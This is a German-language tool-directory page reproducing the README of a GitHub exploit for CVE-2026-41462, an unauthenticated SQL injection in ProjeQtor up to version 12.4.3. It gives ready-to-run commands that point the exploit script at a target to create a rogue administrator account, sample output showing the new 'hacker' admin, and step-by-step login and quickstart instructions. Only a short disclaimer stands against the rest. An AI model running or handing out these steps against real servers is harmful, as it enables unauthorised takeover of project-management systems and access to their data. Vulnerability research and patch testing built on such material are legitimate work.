Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41462 — CVE-2026-41462 | Kitploit
Tools/GitHubGitHub/0xblackash/cve-2026-41462
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHub0xblackash/cve-2026-41462

CVE-2026-41462

CVE-2026-41462

Repository anzeigen
13vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2026-41462 - ProjeQtor Unautorisierte SQL-Injection

projeqtor_cover

Kritische unautorisierte SQL-Injection in ProjeQtor ≤ 12.4.3

Critical CVSS 9.8 Unauthenticated

📌 Übersicht

CVE-2026-41462 ist eine kritische, nicht authentifizierte SQL-Injection-Schwachstelle in der Anmeldefunktionalität des Projektmanagement-Tools ProjeQtor.

  • CVE-ID: CVE-2026-41462
  • Betroffene Versionen: ProjeQtor 7.0 bis 12.4.3
  • Gepatchte Version: 12.4.4
  • Schweregrad: Kritisch (CVSS 9.8)
  • Typ: Nicht authentifizierte gestapelte SQL-Injection

🛠️ Ausnutzung

Verwendung

root@kitploit:~
python3 CVE-2026-41462.py -u http://target.com --create-admin

# Mit eigenen Anmeldedaten
python3 CVE-2026-41462.py -u http://target.com --create-admin \
  --username admin123 --password StrongPass2026!
Tool herunterladen

📊 Was Sie sehen, wenn es funktioniert

Wenn der Exploit erfolgreich ist, sehen Sie eine Ausgabe ähnlich dieser:

root@kitploit:~
[+] Targeting: http://target.com
[+] Sende Payload, um Admin-Benutzer 'hacker' zu erstellen ...
[+] Anfrage erfolgreich gesendet.
[+] Neuer Admin erstellt → Benutzername: hacker | Passwort: Admin123!
[+] Versuchen Sie sich anzumelden unter: http://target.com/login.php

Nach dem Ausführen des Exploits:

  1. Öffnen Sie Ihren Browser und gehen Sie zu:
    http://target.com/login.php

  2. Melden Sie sich mit den im Skriptausgabe angezeigten Anmeldedaten an.

  3. Bei Erfolg landen Sie auf dem ProjeQtor Admin Dashboard mit vollen Administratorrechten.

Erfolgsindikatoren:

  • Sie können alle Projekte, Benutzer und Systemeinstellungen anzeigen
  • Sie können Projekte ohne Einschränkungen erstellen/bearbeiten/löschen
  • Neuer Benutzer erscheint im Benutzerverwaltungsbereich

📁 Repository-Inhalte

DateiBeschreibung
CVE-2026-41462.pyHaupt-Exploit-Skript
CVE-2026-41462.yamlNuclei-Erkennungsvorlage
README.mdDiese Dokumentation

🚀 Schnellstart

  1. Klonen Sie das Repository:

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-41462.git
    cd CVE-2026-41462
    
  2. Führen Sie den Exploit aus:

    root@kitploit:~
    python3 CVE-2026-41462.py -u http://target.com --create-admin
    
  3. Melden Sie sich mit dem neu erstellten Admin-Konto an.


⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests bestimmt. Die unbefugte Nutzung ist illegal.


📄 Referenzen

  • NVD – CVE-2026-41462
  • Offizieller ProjeQtor-Patch (v12.4.4+)

Verantwortungsvolle Offenlegung • Nur ethisches Hacking
Bleiben Sie sicher. Testen Sie legal.